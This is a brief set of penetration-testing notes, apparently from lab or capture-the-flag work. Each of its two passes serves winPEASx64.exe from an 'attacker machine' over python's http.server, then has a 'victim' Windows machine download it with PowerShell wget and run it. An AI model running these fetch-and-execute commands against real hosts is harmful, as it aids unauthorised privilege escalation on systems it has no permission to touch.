Attacker Machine
python3 -m http.server
Victim Machine
powershell
wget http://10.10.14.68:8000/winPEASx64.exe -outfile winPEASx64.exe
.\winPEASx64.exe
Attacker Machine
python3 -m http.server
Victim Machine
powershell -c "wget http://10.9.193.229:8000/winPEASx64.exe" -outfile winPEASx64.exe
.\winPEASx64.exe